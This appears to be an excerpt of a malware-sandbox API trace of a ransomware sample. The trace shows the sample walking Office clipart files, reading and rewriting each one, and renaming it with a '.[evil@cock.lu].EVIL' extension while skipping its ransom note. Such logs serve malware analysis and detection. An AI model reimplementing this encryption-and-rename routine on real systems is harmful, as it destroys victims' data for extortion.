[0155.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2e00, lpOverlapped=0x0) returned 1 [0155.312] CloseHandle (hObject=0x1a8) returned 1 [0155.312] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.312] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.312] __uncaught_exception () returned 0x84b1160800 [0155.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf.[evil@cock.lu].evil")) returned 1 [0155.313] ??_V@YAXPEAX@Z () returned 0x1 [0155.317] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF", dwFileAttributes=0x200) returned 0 [0155.317] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.317] wcsstr (_Str="J0318810.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.317] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF") returned 69 [0155.317] wcscmp (_String1="J0318810.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.317] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0318810.WMF") returned 0x0 [0155.317] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF") returned 0x45 [0155.317] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.336] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x28be, lpOverlapped=0x0) returned 1 [0155.343] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.343] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.343] _errno () returned 0x84b1160840 [0155.344] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.344] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x28c0, lpOverlapped=0x0) returned 1 [0155.344] CloseHandle (hObject=0x1a8) returned 1 [0155.344] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.344] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.344] __uncaught_exception () returned 0x84b1160800 [0155.344] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.359] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf.[evil@cock.lu].evil")) returned 1 [0155.360] ??_V@YAXPEAX@Z () returned 0x1 [0155.364] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF", dwFileAttributes=0x200) returned 0 [0155.364] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.364] wcsstr (_Str="J0321179.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.364] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG") returned 69 [0155.364] wcscmp (_String1="J0321179.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.364] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0321179.JPG") returned 0x0 [0155.364] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG") returned 0x45 [0155.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.367] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x24d7, lpOverlapped=0x0) returned 1 [0155.449] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.449] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.449] _errno () returned 0x84b1160840 [0155.449] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.449] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x24e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x24e0, lpOverlapped=0x0) returned 1 [0155.449] CloseHandle (hObject=0x1a8) returned 1 [0155.450] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.450] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.450] __uncaught_exception () returned 0x84b1160800 [0155.450] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.450] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg.[evil@cock.lu].evil")) returned 1 [0155.452] ??_V@YAXPEAX@Z () returned 0x1 [0155.454] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG", dwFileAttributes=0x200) returned 0 [0155.454] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.454] wcsstr (_Str="J0324694.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.454] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF") returned 69 [0155.455] wcscmp (_String1="J0324694.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.455] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0324694.WMF") returned 0x0 [0155.455] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF") returned 0x45 [0155.455] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.456] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ff8, lpOverlapped=0x0) returned 1 [0155.459] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.459] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.459] _errno () returned 0x84b1160840 [0155.459] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.459] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3000, lpOverlapped=0x0) returned 1 [0155.459] CloseHandle (hObject=0x1a8) returned 1 [0155.459] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.459] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.459] __uncaught_exception () returned 0x84b1160800 [0155.459] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.460] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf.[evil@cock.lu].evil")) returned 1 [0155.460] ??_V@YAXPEAX@Z () returned 0x1 [0155.464] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF", dwFileAttributes=0x200) returned 0 [0155.464] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.464] wcsstr (_Str="J0324704.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.464] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF") returned 69 [0155.464] wcscmp (_String1="J0324704.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.464] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0324704.WMF") returned 0x0 [0155.464] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF") returned 0x45 [0155.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.467] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2e7e, lpOverlapped=0x0) returned 1 [0155.473] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.473] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.474] _errno () returned 0x84b1160840 [0155.474] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.474] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2e80, lpOverlapped=0x0) returned 1 [0155.474] CloseHandle (hObject=0x1a8) returned 1 [0155.474] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.474] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.474] __uncaught_exception () returned 0x84b1160800 [0155.474] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.475] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf.[evil@cock.lu].evil")) returned 1 [0155.476] ??_V@YAXPEAX@Z () returned 0x1 [0155.479] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF", dwFileAttributes=0x200) returned 0 [0155.479] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.479] wcsstr (_Str="J0337280.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.479] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG") returned 69 [0155.479] wcscmp (_String1="J0337280.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.479] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0337280.JPG") returned 0x0 [0155.479] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG") returned 0x45 [0155.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.482] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3260, lpOverlapped=0x0) returned 1 [0155.492] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.492] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.492] _errno () returned 0x84b1160840 [0155.493] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.493] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3280, lpOverlapped=0x0) returned 1 [0155.493] CloseHandle (hObject=0x1a8) returned 1 [0155.493] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.493] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.493] __uncaught_exception () returned 0x84b1160800 [0155.493] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.494] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg.[evil@cock.lu].evil")) returned 1 [0155.495] ??_V@YAXPEAX@Z () returned 0x1 [0155.498] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG", dwFileAttributes=0x200) returned 0 [0155.498] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.498] wcsstr (_Str="J0341328.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.499] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG") returned 69 [0155.499] wcscmp (_String1="J0341328.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.499] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341328.JPG") returned 0x0 [0155.499] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG") returned 0x45 [0155.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.502] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27d4, lpOverlapped=0x0) returned 1 [0155.511] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.511] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.511] _errno () returned 0x84b1160840 [0155.511] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.511] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27e0, lpOverlapped=0x0) returned 1 [0155.511] CloseHandle (hObject=0x1a8) returned 1 [0155.511] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.511] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.512] __uncaught_exception () returned 0x84b1160800 [0155.512] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.512] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg.[evil@cock.lu].evil")) returned 1 [0155.513] ??_V@YAXPEAX@Z () returned 0x1 [0155.516] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG", dwFileAttributes=0x200) returned 0 [0155.516] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.528] wcsstr (_Str="J0341344.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.528] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG") returned 69 [0155.528] wcscmp (_String1="J0341344.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.528] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341344.JPG") returned 0x0 [0155.528] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG") returned 0x45 [0155.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.530] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2cdd, lpOverlapped=0x0) returned 1 [0155.537] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.537] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.537] _errno () returned 0x84b1160840 [0155.537] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.537] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ce0, lpOverlapped=0x0) returned 1 [0155.537] CloseHandle (hObject=0x1a8) returned 1 [0155.537] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.537] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.537] __uncaught_exception () returned 0x84b1160800 [0155.537] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.538] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg.[evil@cock.lu].evil")) returned 1 [0155.538] ??_V@YAXPEAX@Z () returned 0x1 [0155.541] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG", dwFileAttributes=0x200) returned 0 [0155.542] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.542] wcsstr (_Str="J0341439.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.542] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG") returned 69 [0155.542] wcscmp (_String1="J0341439.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.542] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341439.JPG") returned 0x0 [0155.542] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG") returned 0x45 [0155.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.544] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4c6d, lpOverlapped=0x0) returned 1 [0155.557] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.557] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.557] _errno () returned 0x84b1160840 [0155.557] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.557] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4c80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c80, lpOverlapped=0x0) returned 1 [0155.557] CloseHandle (hObject=0x1a8) returned 1 [0155.557] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft 